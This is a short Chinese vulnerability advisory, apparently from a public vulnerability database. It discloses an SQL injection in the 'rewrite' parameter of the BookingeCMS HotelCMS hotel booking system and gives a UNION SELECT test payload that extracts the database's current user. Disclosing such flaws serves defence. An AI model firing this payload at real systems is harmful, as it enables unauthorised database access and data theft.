BookingeCMS HotelCMS酒店预订管理系统rewrite参数SQL注入

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 0x01 漏洞简述 提交时间: 2015-09-04 13:33 公开时间: 2015-12-06 09:00 漏洞类型: SQL注射漏洞 珠海中新信息科技有限公司开发的BookingeCMS HotelCMS /?m=info&rewrite=1 文件rewrite参数存在注入 ### 0x02 漏洞利用 测试Payload: (get提交) ``` ?m=info&rewrite=1' UNION ALL SELECT CONCAT(0x7c,IFNULL(CAST(CURRENT_USER() AS CHAR),0x20),0x7c),NULL%23 ``` ![](https://images.seebug.org/contribute/cf1b4042-7b6e-4852-b413-de8be718c8e3-2015-12-07 14_50_50.jpg) ### 0x03 参考链接 http://www.wooyun.org/bugs/wooyun-2010-0137378

0%

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息